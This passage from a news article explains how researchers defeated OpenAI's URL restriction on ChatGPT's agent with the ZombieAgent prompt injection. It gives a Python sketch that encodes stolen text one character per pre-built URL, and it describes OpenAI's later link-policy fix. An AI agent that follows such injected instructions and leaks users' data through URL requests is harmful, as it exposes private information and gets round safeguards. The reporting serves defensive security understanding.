To block the attack, OpenAI restricted ChatGPT to opening URLs exactly as provided and refusing to add parameters to them, even when explicitly instructed otherwise. With that, ShadowLeak was blocked, since the LLM could no longer construct new URLs by concatenating words or names, appending query parameters, or inserting user-derived data into a base URL.
Radware’s ZombieAgent tweak was simple. The researchers revised the prompt injection to supply a complete list of pre-constructed URLs. Each one consisted of the base URL with a single letter or number appended, for example example.com/a, example.com/b, and so on through the rest of the alphabet, along with example.com/0 through example.com/9. The prompt also instructed the agent to substitute a special token for spaces.
Diagram illustrating the URL-based character exfiltration used to bypass the allow list ChatGPT introduced in response to ShadowLeak. Credit: Radware
ZombieAgent worked because OpenAI developers didn’t restrict the agent from opening URLs that already had a single letter or number appended to them. That allowed the attack to exfiltrate data letter by letter.
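To make the mechanism concrete, here is a minimal Python sketch of that per-character encoding. The domain, the space token, and the character set are illustrative assumptions; Radware has not published the exact strings used in the injected prompt.

```python
# Minimal sketch of per-character exfiltration of the kind ZombieAgent relies on.
# The attacker-controlled domain and the space token are hypothetical stand-ins.

BASE = "https://example.com/"     # attacker-controlled collection server (assumed)
SPACE_TOKEN = "_"                 # assumed substitute for spaces
ALLOWED = set("abcdefghijklmnopqrstuvwxyz0123456789") | {SPACE_TOKEN}

def urls_for_secret(secret: str) -> list[str]:
    """Map each character of the stolen text to one pre-built URL.

    Every URL already appears in the injected prompt's list, so the agent
    never constructs or modifies a URL; it only opens them in order.
    """
    urls = []
    for ch in secret.lower():
        ch = SPACE_TOKEN if ch == " " else ch
        if ch in ALLOWED:
            urls.append(BASE + ch)
    return urls

# The attacker's server log then spells the secret back out from the
# order of incoming requests: /j /o /h /n /_ /d /o /e -> "john doe"
print(urls_for_secret("John Doe"))
```

The attacker’s server reconstructs the stolen text simply from the order in which those per-character URLs are requested.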
OpenAI has since mitigated the ZombieAgent attack by barring ChatGPT from opening any link that originates in an email unless it either appears in a well-known public index or was provided directly by the user in a chat prompt. The tweak is aimed at keeping the agent from opening base URLs that lead to an attacker-controlled domain.
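A link policy along those lines might look roughly like the sketch below. This is purely a conceptual illustration, assuming a hypothetical is_in_public_index lookup; OpenAI has not published how its check is actually implemented.

```python
# Conceptual sketch of the link policy described above; not OpenAI's code.
# `is_in_public_index` is a hypothetical lookup against a well-known URL index.

from urllib.parse import urlparse

def may_open(url: str, user_supplied_urls: set[str], is_in_public_index) -> bool:
    """Allow a link found in an email only if the user supplied it or it is publicly indexed."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    if url in user_supplied_urls:        # pasted directly by the user in the chat
        return True
    return is_in_public_index(url)       # found in a well-known public index

# Usage: a pre-built attacker URL fails both checks and is never fetched.
blocked = may_open("https://example.com/a",
                   user_supplied_urls=set(),
                   is_in_public_index=lambda u: False)
print(blocked)  # False
```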
In fairness, OpenAI is hardly alone in this cycle of mitigating an attack only to see it revived through a simple change. If the past five years are any guide, the pattern is likely to endure indefinitely, much the way SQL injection and memory corruption vulnerabilities continue to provide hackers with the fuel they need to compromise software and websites.
“Guardrails should not be considered fundamental solutions for the prompt injection problems,” Pascal Geenens, VP of threat intelligence at Radware, wrote in an email. “Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”


